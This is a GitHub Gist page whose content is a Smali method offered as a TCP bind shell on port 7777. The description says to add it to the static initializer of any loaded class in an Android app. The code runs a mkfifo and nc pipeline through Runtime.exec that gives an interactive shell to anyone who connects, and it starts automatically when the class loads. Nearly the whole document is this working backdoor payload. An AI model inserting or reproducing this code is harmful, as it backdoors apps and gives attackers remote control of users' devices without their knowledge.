Last active
March 22, 2024 12:54
-
-
Save SeanPesce/3c1d69087c48c3036bf92002fbf8e0d3 to your computer and use it in GitHub Desktop.
TCP bind shell (port 7777) written in Smali. Add this to the static initializer code (clinit) of any loaded class to start the listener.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .method static constructor <clinit>()V | |
| .locals 5 | |
| invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime; | |
| move-result-object v0 | |
| const/4 v1, 3 | |
| new-array v2, v1, [Ljava/lang/String; | |
| const/4 v3, 0 | |
| const-string v4, "sh" | |
| aput-object v4, v2, v3 | |
| const/4 v3, 1 | |
| const-string v4, "-c" | |
| aput-object v4, v2, v3 | |
| const/4 v3, 2 | |
| const-string v4, "rm -f $TMPDIR/SeanPesceShell;mkfifo $TMPDIR/SeanPesceShell; (echo \"echo '[TCP Bind Shell by Sean Pesce]'\" ;cat $TMPDIR/SeanPesceShell)|sh -i 2>&1|nc -lp 7777 >$TMPDIR/SeanPesceShell" | |
| aput-object v4, v2, v3 | |
| invoke-virtual {v0, v2}, Ljava/lang/Runtime;->exec([Ljava/lang/String;)Ljava/lang/Process; | |
| move-result-object v1 | |
| return-void | |
| .end method |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment